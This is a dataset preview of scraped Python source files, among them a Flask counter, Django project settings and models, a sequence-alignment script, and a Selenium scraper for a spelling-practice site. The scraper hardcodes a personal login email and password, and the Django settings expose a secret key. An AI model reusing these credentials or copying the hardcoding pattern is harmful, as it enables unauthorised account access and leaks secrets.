Dataset schema (column name, dtype, observed length range or number of distinct values; ⌀ marks columns containing nulls):

| column | dtype | lengths / values |
|---|---|---|
| blob_id | string | length 40 |
| directory_id | string | length 40 |
| path | string | length 2–616 |
| content_id | string | length 40 |
| detected_licenses | list | length 0–69 |
| license_type | string | 2 classes |
| repo_name | string | length 5–118 |
| snapshot_id | string | length 40 |
| revision_id | string | length 40 |
| branch_name | string | length 4–63 |
| visit_date | timestamp[us] | |
| revision_date | timestamp[us] | |
| committer_date | timestamp[us] | |
| github_id | int64 | 2.91k–686M ⌀ |
| star_events_count | int64 | 0–209k |
| fork_events_count | int64 | 0–110k |
| gha_license_id | string | 23 classes |
| gha_event_created_at | timestamp[us] | |
| gha_created_at | timestamp[us] | |
| gha_language | string | 213 classes |
| src_encoding | string | 30 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 2–10.3M |
| extension | string | 246 classes |
| content | string | length 2–10.3M |
| authors | list | length 1 |
| author_id | string | length 0–212 |
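The preview rows below follow this schema, one field per `|`-delimited cell, with the `content` field rendered inline. To work with the data programmatically rather than through this preview, a streaming filter along these lines should work. This is a minimal sketch: the repository id is a placeholder, not the dataset's real name, and the field names are taken from the schema table above.

```python
# Minimal sketch, assuming the dataset is hosted on the Hugging Face Hub.
# "user/python-source-files" is a placeholder repository id.
from datasets import load_dataset

ds = load_dataset("user/python-source-files", split="train", streaming=True)

for row in ds:
    # Keep small, permissively licensed, hand-written (non-vendored,
    # non-generated) Python files.
    if (row["license_type"] == "permissive"
            and not row["is_vendor"]
            and not row["is_generated"]
            and row["length_bytes"] < 10_000):
        print(row["repo_name"], row["path"], row["length_bytes"])
```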
b92567f6fee076f85955d800f93fd648f213ee28
|
1afac76706254ad3a30329e7c20464404a350679
|
/app.py
|
57175e88d04132aead3c1b1395a79896062b2124
|
[] |
no_license
|
fmind/composed
|
85a06549dc94bdfa65847aef0e3dd9037331fdee
|
3cca3046ebfec35f1ecb295cb4b64661555ae423
|
refs/heads/master
| 2020-08-18T20:52:35.761875
| 2019-10-17T16:03:00
| 2019-10-17T16:03:00
| 215,832,577
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 532
|
py
|
#!/usr/bin/env python3
import time

import redis
from flask import Flask

app = Flask(__name__)
cache = redis.Redis(host='redis')

def get_hit_count():
    retries = 5
    while True:
        try:
            return cache.incr('hits')
        except redis.exceptions.ConnectionError as exc:
            if retries == 0:
                raise exc
            retries -= 1
            time.sleep(0.5)

@app.route('/')
def hello():
    count = get_hit_count()
    return 'Hello Composed! I have been seen {} times.\n'.format(count)
|
[
"fmind@fmind.me"
] |
fmind@fmind.me
|
c0652561063de856a21b2cafab43f4a51934177e
|
8e12c5e91e6d3f1c3d69a80835315520f39890b9
|
/word_count.py
|
ac1f9be6faa4b6901d900af0904a312dfdcb8460
|
[] |
no_license
|
clemwek/word_count
|
d67840bbbc8bd26088c92ac54040652e85a4fea9
|
b6e11cbfa1daddfd815969d7bb165478e31a162a
|
refs/heads/master
| 2021-01-11T19:06:10.692564
| 2017-01-18T11:05:08
| 2017-01-18T11:05:08
| 79,317,221
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 578
|
py
|
"""word count"""
# recieve the text
# split to words and save in a list
# loop thro the list conting and saving the out
def words(words):
try:
words = words.split()
dic_out = {}
for word in words:
if word.isdigit():
if int(word) in dic_out:
dic_out[int(word)] = dic_out[int(word)]+1
else:
dic_out[int(word)] = 1
else:
if word in dic_out:
dic_out[word] = dic_out[word]+1
else:
dic_out[word] = 1
return dic_out
except Exception:
return 'invalid'
print(words("hello there we hello we are people from planet earth 1 2 2 3"))
|
[
"clemwek@gmail.com"
] |
clemwek@gmail.com
|
c4bb979e645dd69f594afabb966031af9569c2a5
|
210c10bd0abb34a50ace14a24df5f4071dbc3384
|
/xonsh_cripts/local/console.py
|
71acc0f2504ac1b82de194e1739b2114379470f7
|
[] |
no_license
|
MaximilianoRom7/mromay_bashrc
|
87618ed80f183287c7a13b911c7257b332f557c6
|
b06e6c83c5f0f32316c4b8cba58bc32685daab2b
|
refs/heads/master
| 2020-04-25T19:53:11.448806
| 2019-06-16T18:45:43
| 2019-06-16T18:45:43
| 173,036,193
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 655
|
py
|
def removeLastNewLine(text):
    # Guard against empty input, which would make text[-1] raise IndexError.
    if text and text[-1] == "\n":
        return text[:-1]
    else:
        return text

def pipeArgs(pipe):
    if pipe:
        return removeLastNewLine(pipe.read()).split(" ")
    else:
        return []

def printDict(d):
    out = ""
    if type(d) == dict:
        for key, val in d.items():
            out += str(key) + ": " + str(val) + "\n"
        return out
    else:
        return str(d) + "\n"

def newline(func):
    """
    Calls the original function, appending a newline at the end.
    """
    def inner(args, pipe=None):
        args += pipeArgs(pipe)
        return printDict(func(*args)) + "\n"
    return inner
|
[
"maximilianorom7@gmail.com"
] |
maximilianorom7@gmail.com
|
94a7fa977648e4a740cc016cecbbd3dc3a3494d6
|
a63b37bdb0359fe004362d20faac0cfbfb052444
|
/mysite/settings.py
|
700ed2f41905c21213bcd7e157f0022c588496c5
|
[] |
no_license
|
Psihiatr/my-first-blog
|
914522d49588f4a64d5e91111987fba4c0689879
|
e395cefbd736b0d58d18978845ec0a3ab7104cc8
|
refs/heads/master
| 2020-06-26T01:23:38.729972
| 2019-07-29T15:37:17
| 2019-07-29T15:37:17
| 199,481,267
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,197
|
py
|
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 2.0.13.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '-t-)o4=7p94bs_o)ssj%l$d+7*5o9go!x*5yw9fltt(_67vbbj'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['127.0.0.1', '<pedch>.pythonanywhere.com']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'ru-ru'
TIME_ZONE = 'Europe/Kiev'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
|
[
"romapedchenko1997@gmail.com"
] |
romapedchenko1997@gmail.com
|
387948ecb79da7c39d86241dc6c3e02cbe8b89ea
|
fdedd2a4bae2199618d789c3e6ae4195bfae5f55
|
/empproject/testapp/models.py
|
0398b0c3413cc7d22b98827e77c80898852f655d
|
[] |
no_license
|
sai-goutham/jobs-local
|
ce59660ab00fecd0f08a17287f41c904c882b34e
|
2ea8be78295e45d989dc61c7d3c83d5a067cac9c
|
refs/heads/main
| 2023-04-17T07:47:33.848948
| 2021-04-30T06:38:38
| 2021-04-30T06:38:38
| 363,036,388
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 382
|
py
|
from django.db import models

# Create your models here.
# CustomManager must be defined before Employee references it;
# otherwise the Employee class body raises NameError.
class CustomManager(models.Manager):
    def get_queryset(self):
        return super().get_queryset().order_by('eno')

class Employee(models.Model):
    eno = models.IntegerField()
    ename = models.CharField(max_length=30)
    esal = models.FloatField()
    eaddr = models.CharField(max_length=30)
    objects = CustomManager()
|
[
"saigowthambhuma@gmail.com"
] |
saigowthambhuma@gmail.com
|
a53dd3997037749bae7b10e90123e9fbcddead6d
|
67b0379a12a60e9f26232b81047de3470c4a9ff9
|
/hotline_old/urls.py
|
87b946473dd6f5a8a73078984128ef492880bb60
|
[] |
no_license
|
vintkor/whitemandarin
|
8ea9022b889fac718e0858873a07c586cf8da729
|
5afcfc5eef1bb1cc2febf519b04a4819a7b9648f
|
refs/heads/master
| 2021-05-06T03:35:09.367375
| 2017-12-20T15:43:08
| 2017-12-20T15:43:08
| 114,904,110
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 746
|
py
|
from django.conf.urls import include, url

from hotline import views as hotline_views

urlpatterns = (
    # Examples:
    url(r'lastscan/$', hotline_views.lastscan, name='lastscan'),
    url(r'get_category/$', hotline_views.get_category, name='get_category'),
    url(r'get_category_data/$', hotline_views.get_category_data, name='get_category_data'),
    url(r'scan_it/$', hotline_views.scan_it, name='scan_it'),
    url(r'get_status/$', hotline_views.get_status, name='get_status'),
    url(r'^savecat/(?P<id>[0-9]+)/$', hotline_views.savecat, name='savecat'),
    url(r'^getprice/(?P<id>[0-9]+)/$', hotline_views.getprice, name='getprice'),
    url(r'^get_not_active/(?P<id>[0-9]+)/$', hotline_views.get_not_active, name='get_not_active'),
)
|
[
"alkv84@yandex.ru"
] |
alkv84@yandex.ru
|
f38f7c7bd758efb2608a137557708d280f3b3a87
|
d21c79c997ff3ac033fe5fc5e5a646134dd920e8
|
/demo/utils/get_img.py
|
e41a9651a84080377da4d67ae547eb9b2b98b55b
|
[] |
no_license
|
xinghanggogogo/scrapy_auto_proxy
|
cbc67dacc21974c172fb2071eaea56d87069669f
|
a7f7b76267f37c12613ab47181988609eb98bc78
|
refs/heads/master
| 2021-01-11T18:11:38.124993
| 2017-01-20T03:11:26
| 2017-01-20T03:11:26
| 79,511,246
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 766
|
py
|
#-*- coding: utf-8 -*-
# Python 2 script (urllib2/cookielib imports and print statements).
import os
import uuid
import urllib2
import cookielib
import requests
import re
import urllib
from demo.models.ebookmodel import *

img_path = "/home/xinghang/spider/"

def get_img_extend_name(img_url):
    img_url = img_url.strip()
    extend_name = '.' + img_url.split('.')[-1]
    return extend_name

books_info = ebookModel.select()
for book_info in books_info:
    try:
        img_url = book_info.img_url
        img_name = book_info.isbn13
        print img_url, img_name
        extend_name = get_img_extend_name(img_url)
        r = requests.get(img_url, stream=True)
        with open(img_path + img_name + extend_name, 'wb') as fd:
            for chunk in r.iter_content():
                fd.write(chunk)
    except:
        pass
|
[
"xinghang@thunder.com.cn"
] |
xinghang@thunder.com.cn
|
ccc6cddcf213e8e4bbaaeb32c2c9f8a65707c579
|
1b4816806c16e329e0a6a2a38ce770df796badfe
|
/AffineGap.py
|
da7cfabd55b83f0c74e7f370fab7c49152e9a61e
|
[] |
no_license
|
XueningHe/Rosalind_Sequence_Alignment
|
45e68c97353c9796c321a0e6aa37c4c2a06dcfcd
|
c0fbc444d4110670fc66f1a18605fb9d01bfb4b7
|
refs/heads/master
| 2022-04-22T01:02:46.212911
| 2020-04-28T03:46:10
| 2020-04-28T03:46:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,225
|
py
|
import numpy as np

scorelist = []
with open("BLOSUM62.txt", "r") as f:
    aalist = f.readline().split()
    for line in f:
        scorelist.append(list(map(int, line.split()[1:])))
substitutionmatrix = np.array(scorelist)
scoredict = dict()
for i in range(len(aalist)):
    for j in range(i, len(aalist)):
        scoredict[(aalist[i], aalist[j])] = substitutionmatrix[i][j]
        scoredict[(aalist[j], aalist[i])] = substitutionmatrix[i][j]

def AffineGapAlignment(peptide1, peptide2, gapopen, gapextension):
    lengthpeptide1 = len(peptide1)
    lengthpeptide2 = len(peptide2)
    tracebackl = np.zeros(shape=(lengthpeptide1+1, lengthpeptide2+1))
    tracebackm = np.zeros(shape=(lengthpeptide1+1, lengthpeptide2+1))
    tracebacku = np.zeros(shape=(lengthpeptide1+1, lengthpeptide2+1))
    lower = np.zeros(shape=(lengthpeptide1+1, lengthpeptide2+1))
    middle = np.zeros(shape=(lengthpeptide1+1, lengthpeptide2+1))
    upper = np.zeros(shape=(lengthpeptide1+1, lengthpeptide2+1))
    lower[0][0] = np.nan
    upper[0][0] = np.nan
    for i in range(1, lengthpeptide1+1):
        middle[i][0] = -gapopen - (i-1)*gapextension
        tracebackm[i][0] = 23
        lower[i][0] = -gapopen - (i-1)*gapextension
        tracebackl[i][0] = 13
        upper[i][0] = np.nan
    for j in range(1, lengthpeptide2+1):
        middle[0][j] = -gapopen - (j-1)*gapextension
        tracebackm[0][j] = 22
        upper[0][j] = -gapopen - (j-1)*gapextension
        tracebacku[0][j] = 32
        lower[0][j] = np.nan
    for i in range(1, lengthpeptide1+1):
        for j in range(1, lengthpeptide2+1):
            if not np.isnan(lower[i-1][j]):
                lower[i][j] = max(lower[i-1][j]-gapextension, middle[i-1][j]-gapopen)
                if lower[i][j] == lower[i-1][j]-gapextension:
                    tracebackl[i][j] = 13
                else:
                    tracebackl[i][j] = 14
            else:
                lower[i][j] = middle[i-1][j]-gapopen
                tracebackl[i][j] = 14
            if not np.isnan(upper[i][j-1]):
                upper[i][j] = max(upper[i][j-1]-gapextension, middle[i][j-1]-gapopen)
                if upper[i][j] == upper[i][j-1]-gapextension:
                    tracebacku[i][j] = 32
                else:
                    tracebacku[i][j] = 34
            else:
                upper[i][j] = middle[i][j-1]-gapopen
                tracebacku[i][j] = 34
            middle[i][j] = max(lower[i][j], upper[i][j], middle[i-1][j-1]+scoredict[(peptide1[i-1], peptide2[j-1])])
            if middle[i][j] == lower[i][j]:
                tracebackm[i][j] = 23
            elif middle[i][j] == upper[i][j]:
                tracebackm[i][j] = 22
            else:
                tracebackm[i][j] = 21
    return (lower, middle, upper, tracebackl, tracebackm, tracebacku)

def TraceBack(peptide1, peptide2, gapopen, gapextension):
    matrices = AffineGapAlignment(peptide1, peptide2, gapopen, gapextension)
    lower = matrices[0]
    middle = matrices[1]
    upper = matrices[2]
    tracebackl = matrices[3]
    tracebackm = matrices[4]
    tracebacku = matrices[5]
    lengthpeptide1 = len(peptide1)
    lengthpeptide2 = len(peptide2)
    i = lengthpeptide1
    j = lengthpeptide2
    alignedpeptide1 = []
    alignedpeptide2 = []
    finalscore = max(lower[lengthpeptide1][lengthpeptide2], middle[lengthpeptide1][lengthpeptide2], upper[lengthpeptide1][lengthpeptide2])
    if finalscore == lower[lengthpeptide1][lengthpeptide2]:
        workingtracematrix = tracebackl
    elif finalscore == middle[lengthpeptide1][lengthpeptide2]:
        workingtracematrix = tracebackm
    else:
        workingtracematrix = tracebacku
    while i or j:
        if workingtracematrix[i][j] == 13:
            alignedpeptide1.insert(0, peptide1[i-1])
            alignedpeptide2.insert(0, "-")
            i -= 1
        elif workingtracematrix[i][j] == 14:
            alignedpeptide1.insert(0, peptide1[i-1])
            alignedpeptide2.insert(0, "-")
            workingtracematrix = tracebackm
            i -= 1
        elif workingtracematrix[i][j] == 21:
            alignedpeptide1.insert(0, peptide1[i-1])
            alignedpeptide2.insert(0, peptide2[j-1])
            i -= 1
            j -= 1
            workingtracematrix = tracebackm
        elif workingtracematrix[i][j] == 32:
            alignedpeptide1.insert(0, "-")
            alignedpeptide2.insert(0, peptide2[j-1])
            j -= 1
        elif workingtracematrix[i][j] == 34:
            alignedpeptide1.insert(0, "-")
            alignedpeptide2.insert(0, peptide2[j-1])
            workingtracematrix = tracebackm
            j -= 1
        elif workingtracematrix[i][j] == 22:
            workingtracematrix = tracebacku
        elif workingtracematrix[i][j] == 23:
            workingtracematrix = tracebackl
        else:
            print("There seems to be a problem at", i, j, "with value:", workingtracematrix[i][j], "in this matrix:", workingtracematrix)
            return
    return (str(int(finalscore)), "".join(alignedpeptide1), "".join(alignedpeptide2))

with open("data.txt", "r") as f:
    content = f.read().split()
    peptide1 = content[0]
    peptide2 = content[1]
gapopen = 11
gapextension = 5
results = TraceBack(peptide1, peptide2, gapopen, gapextension)
print("For gap extension as", gapextension)
for item in results:
    print(item)
|
[
"noreply@github.com"
] |
XueningHe.noreply@github.com
|
cdea4de127fe453c1325d0c9fd2518239edddce5
|
d403a80caa0290c8b4584ecc641e04ac786706b9
|
/spelling-bee/download_spellpundit_collection.py
|
967fe0d8ea71dd0c668298a38376268fda6f48ec
|
[] |
no_license
|
ditojohn/py3-raspi
|
8a0ddec568db3b3789a03c88f29e14103e0eb603
|
01dee7631206277c963d7d946d318b2980452532
|
refs/heads/master
| 2023-04-17T04:46:09.191497
| 2021-05-02T20:04:10
| 2021-05-02T20:04:10
| 228,090,372
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 18,301
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import time
import re
import urllib3
from bs4 import BeautifulSoup
import traceback

sys.path.insert(0, "..")
import common.rpimod.stdio.input as cinput
import common.rpimod.stdio.output as coutput
import common.rpimod.stdio.fileio as cfile

# Set to True to turn debug messages on
#APP_DEBUG_MODE_ENABLED = True
APP_DEBUG_MODE_ENABLED = False

################################################################
# Configuration variables
################################################################

APP_SOURCE_ID = "spell-pundit"
APP_SOURCE_DESC = "SpellPundit"
APP_SOURCE_URL = "https://www.spellpundit.com/spell/index.php"
APP_DATA_DIR = "data/download/spellpundit/"

# Vocabulary
APP_MODULE_ID = "001"
APP_MODULE_TYPE = "homonyms"  # Set to module type: "roots", "spelling", "vocab"
APP_NAVIGATE_MENU = "Homonyms>Homonyms Module"
APP_MODULE_NM = "homonyms"  #"vocab-01-easy-intermed"
APP_COLLECTION_CATEGORY = "Homonyms"  # Set to module type: "roots", "spelling", "vocab"

# Set to empty list as default to select all sets
APP_SELECT_SET_LIST = []
# Set to name of first list as default to select all sets
APP_START_SET_NM = "set-03"  #"set-09"
# Set to empty string as default to select all sets
APP_STOP_SET_NM = ""

# ToDo : Support for lists of modules
APP_MODULE_LIST = [
    {
        "id": "",
        "type": "",
        "name": "spelling-contest-spandana-2019-junior",
        "menu": "Spelling>Spandana Spelling Bee Modules>2019 Spandana Junior Spelling List Words Module",
        "selectList": [],
        "startSet": "",
        "stopSet": ""
    }
]

# Fast
APP_INIT_WAIT_DELAY = 4
APP_TIMEOUT_WAIT_DELAY = 6
APP_WAIT_DELAY = 1
APP_SLEEP_DELAY = 1
# Medium
APP_INIT_WAIT_DELAY = 4.5
APP_TIMEOUT_WAIT_DELAY = 8
APP_WAIT_DELAY = 1.5
APP_SLEEP_DELAY = 2
# Slow
APP_INIT_WAIT_DELAY = 5
APP_TIMEOUT_WAIT_DELAY = 10
APP_WAIT_DELAY = 3
APP_SLEEP_DELAY = 4

################################################################
# Application Directories
################################################################

APP_LIST_DIR = APP_DATA_DIR + "list/"
APP_DICT_DIR = APP_DATA_DIR + "dict/"

################################################################
# Application Files
################################################################

APP_LIST = "spelling_bee_{SOURCE}-{MODULE_ID}-{MODULE_NM}-{SET_ID}-wordset.txt"
APP_LIST_ERROR = "spelling_bee_{SOURCE}-{MODULE_ID}-{MODULE_NM}-{SET_ID}-wordset.err"
APP_DICT_ENTR = "sb_{WORD}.dat"
APP_DICT_CLIP = "sb_{WORD}.mp3"

################################################################
# Internal Variables
################################################################

APP_USER_AGENT = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'}
APP_NEWLINE = "\n"
APP_EMPTY_STRING = ""
APP_WORD_DELIMITER = ";"

################################################################
# Configure Selenium Chrome Webdriver
# Reference:
# https://www.quora.com/How-do-I-install-Selenium-in-Python-on-a-Linux-environment
# https://christopher.su/2015/selenium-chromedriver-ubuntu/
# https://stackoverflow.com/questions/50642308/webdriverexception-unknown-error-devtoolsactiveport-file-doesnt-exist-while-t
# https://stackoverflow.com/questions/59186984/selenium-common-exceptions-sessionnotcreatedexception-message-session-not-crea
################################################################

from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

chrome_options = Options()
#chrome_options.add_argument("start-maximized")  # open Browser in maximized mode
chrome_options.add_argument("disable-infobars")  # disabling infobars
chrome_options.add_argument("--disable-extensions")  # disabling extensions
chrome_options.add_argument("--disable-gpu")  # applicable to windows os only
chrome_options.add_argument("--disable-dev-shm-usage")  # overcome limited resource problems
chrome_options.add_argument("--no-sandbox")  # bypass OS security model -- Addresses unknown error: DevToolsActivePort file doesn't exist
chrome_options.add_argument('--headless')  # run in headless mode -- in case of chromedriver compatibility issues
chrome_options.add_argument('window-size=1920x1480')
chrome_options.add_argument("--mute-audio")  # mute audio
browser = webdriver.Chrome(chrome_options=chrome_options)

################################################################
# Configure Connection Pool
################################################################

connectionPool = urllib3.PoolManager(5, headers=APP_USER_AGENT)

################################################################
# Application
################################################################

def exit_app(exitCode=0):
    # Close browser session
    browser.close()
    # Resume input from stdin
    cinput.set_term_input(True)
    # Exit
    exit(exitCode)

# Open new session in browser
while True:
    try:
        wait = WebDriverWait(browser, APP_INIT_WAIT_DELAY)
        browser.get(APP_SOURCE_URL)
        #browser.save_screenshot('download_spellpundit_module-output-001.png')
        userBox = wait.until(EC.presence_of_element_located((By.NAME, 'user')))
        print("Sending Username...")
        userBox.send_keys("dito.john@gmail.com")
        time.sleep(APP_WAIT_DELAY)
        passBox = wait.until(EC.presence_of_element_located((By.NAME, 'passwd')))
        print("Sending Password...")
        passBox.send_keys("karukutty")
        time.sleep(APP_WAIT_DELAY)
        print("Logging in...")
        browser.find_element_by_xpath("//button[text()='Sign in']").click()
        time.sleep(APP_SLEEP_DELAY)
        print("\nHome URL: " + browser.current_url)
        print("Navigating to menu for module {SOURCE}/{MODULE_ID}-{MODULE_NM}...".format(SOURCE=APP_SOURCE_ID, MODULE_ID=APP_MODULE_ID, MODULE_NM=APP_MODULE_NM))
        for menuItem in APP_NAVIGATE_MENU.split('>'):
            print("Navigating to menu item: {}".format(menuItem))
            browser.find_element_by_link_text(menuItem).click()
            time.sleep(APP_WAIT_DELAY)
        print("\nFetching module meta-info ...")
        print("Module URL: " + browser.current_url)
        moduleTitle = browser.find_element_by_xpath("//div[@class='panel-heading']").text
        moduleTableElement = browser.find_element_by_xpath("//div[@class='table-responsive']")
        # Break loop if try is successful
        break
    except Exception as e:
        # Displays the trace for the error
        coutput.print_err(traceback.format_exc())
        exceptionName = type(e).__name__
        if exceptionName == "TimeoutException":
            coutput.print_warn("Connection timeout. Waiting for {}s ...".format(APP_TIMEOUT_WAIT_DELAY))
            time.sleep(APP_TIMEOUT_WAIT_DELAY)
        else:
            exit_app(1)

# Retrieve sets from module
setRowElements = moduleTableElement.find_elements_by_xpath("//table/tbody/tr")
setCounter = 0
setEntries = []
processFlag = False
for setRowElement in setRowElements:
    setCounter = setCounter + 1
    setColElement = setRowElement.find_element_by_xpath(".//td")
    setName = setColElement.text.strip().lower().replace(" ", "-")
    setID = "{:03d}-".format(setCounter) + setName
    setURL = setRowElement.find_element_by_xpath(".//a[contains(@href,'&bt=r') and not(contains(@href,'_test_'))]").get_property("href")
    print("Checking set {}.".format(setName))
    coutput.print_watcher("setID")
    coutput.print_watcher("setURL")
    if len(APP_SELECT_SET_LIST) > 0:
        if setName in APP_SELECT_SET_LIST:
            processFlag = True
        else:
            processFlag = False
    else:
        if APP_START_SET_NM == APP_EMPTY_STRING:
            processFlag = True
        elif setName == APP_START_SET_NM:
            processFlag = True
        if setName == APP_STOP_SET_NM:
            processFlag = False
    if processFlag is False:
        print("Set {} marked for exclusion. Skipping.".format(setName))
    else:
        print("Set {} marked for processing.".format(setName))
        setEntries.append({"id": setID, "name": setName, "url": setURL})

print("\nModule Label: " + moduleTitle)
print("Sets marked for processing:")
for setEntry in setEntries:
    print(setEntry)
userInput = cinput.get_keypress("\nPlease review sets and press any key when ready ... ")

# Iterate through sets from module
for setEntry in setEntries:
    print("\nSet URL: " + setEntry["url"])
    while True:
        try:
            browser.get(setEntry["url"])
            print("\nInitializing list and error files ...")
            APP_LIST_FILE = APP_LIST_DIR + cfile.cleanse_filename(APP_LIST.format(SOURCE=APP_SOURCE_ID, MODULE_ID=APP_MODULE_ID, MODULE_NM=APP_MODULE_NM, SET_ID=setEntry["id"]))
            print("Word List: " + APP_LIST.format(SOURCE=APP_SOURCE_ID, MODULE_ID=APP_MODULE_ID, MODULE_NM=APP_MODULE_NM, SET_ID=setEntry["id"]))
            if os.path.isfile(APP_LIST_FILE) and os.path.getsize(APP_LIST_FILE) > 0:
                print("List file {} exists. Deleting...".format(APP_LIST_FILE))
                cfile.delete(APP_LIST_FILE)
            APP_LIST_ERROR_FILE = APP_LIST_DIR + cfile.cleanse_filename(APP_LIST_ERROR.format(SOURCE=APP_SOURCE_ID, MODULE_ID=APP_MODULE_ID, MODULE_NM=APP_MODULE_NM, SET_ID=setEntry["id"]))
            if os.path.isfile(APP_LIST_ERROR_FILE) and os.path.getsize(APP_LIST_ERROR_FILE) > 0:
                print("List error file {} exists. Deleting...".format(APP_LIST_ERROR_FILE))
                cfile.delete(APP_LIST_ERROR_FILE)
            # Break loop if try is successful
            break
        except Exception as e:
            # Displays the trace for the error
            coutput.print_err(traceback.format_exc())
            exceptionName = type(e).__name__
            if exceptionName == "TimeoutException":
                coutput.print_warn("Connection timeout. Waiting for {}s ...".format(APP_TIMEOUT_WAIT_DELAY))
                time.sleep(APP_TIMEOUT_WAIT_DELAY)
            else:
                exit_app(1)
    while True:
        try:
            print("\nFetching word meta-info ...")
            headInfoElement = browser.find_element_by_css_selector(".col-sm-9.col-md-9").find_element_by_css_selector(".panel-heading")
            moduleName = headInfoElement.find_element_by_tag_name("a").text
            wordInfoElement = browser.find_element_by_xpath("//form[contains(@name,'moduleform')]")
            moduleID = wordInfoElement.find_element_by_id("module_id").get_property("value")
            wordID = wordInfoElement.find_element_by_xpath("//*[contains(@id,'_id')]").get_property("value")
            bodyInfoElement = wordInfoElement.find_element_by_xpath("//div[@class='table-responsive']/table/thead")
            reMatch = re.search("(.*)[ ]+(?:Root|Word|Vocabulary Word|Homonym)[ ]+(\d+)[ ]+of[ ]+(\d+).*", bodyInfoElement.text, flags=re.M)
            wordIndex = reMatch.group(2).strip() + "/" + reMatch.group(3).strip()
            reMatch = re.search("https://.*/\?mode=(\w+).*", setEntry["url"], flags=re.M)
            mode = reMatch.group(1).strip()
            print("\n>>>>>>>>>> {} Fetching entry rows ...".format(wordIndex))
            entryRows = browser.find_elements_by_xpath("//div[@class='table-responsive']/table/tbody/tr")
            setWord = APP_COLLECTION_CATEGORY
            for row in entryRows:
                entryCols = row.find_elements_by_tag_name("td")
                if len(entryCols) == 0:
                    continue
                elif len(entryCols) != 7:
                    cfile.append(APP_LIST_ERROR_FILE, "Unexpected Columns:{}:{}".format(len(entryCols), row.text.strip()))
                    continue
                displayWord = ''
                listWord = ''
                keyWord = ''
                wordMeta = ''
                wordRespelling = ''
                wordAudioURL = ''
                wordFuncLabel = ''
                wordEtymology = ''
                wordDefinition = ''
                wordExamples = ''
                wordNote = ''
                wordSentence = ''
                wordRelated = ''
                wordEntry = ''
                displayWord = entryCols[0].text.strip()
                listWord = re.sub('[ ;,]+(also|or|oe|plural)[ ;,]+', APP_WORD_DELIMITER, displayWord, flags=re.IGNORECASE)
                listWord = re.sub('-(also|or|oe|plural)[, ]+', '-' + APP_WORD_DELIMITER, listWord, flags=re.IGNORECASE)
                listWord = re.sub(',[; ]+', APP_WORD_DELIMITER, listWord, flags=re.IGNORECASE)
                listWord = listWord.strip()
                keyWord = re.sub(';.*', APP_EMPTY_STRING, listWord, flags=re.IGNORECASE).replace(" ", "_").lower().strip()
                wordMeta = 'Mode={};ModuleName={};ModuleID={};SetName={};SetID={};WordIndex={};WordID={};KeyWord={};DisplayWord={}'.format(mode, moduleName, moduleID, setEntry["name"], setEntry["id"], wordIndex, wordID, keyWord, displayWord)
                setWord = setWord + "|" + listWord
                audioElement = entryCols[1].find_element_by_xpath(".//audio[contains(@id,'audio')]")
                if audioElement is not None:
                    wordAudioURL = audioElement.get_property("src")
                wordRespelling = entryCols[2].text.strip()
                wordRespelling = "\\{}\\".format(wordRespelling)
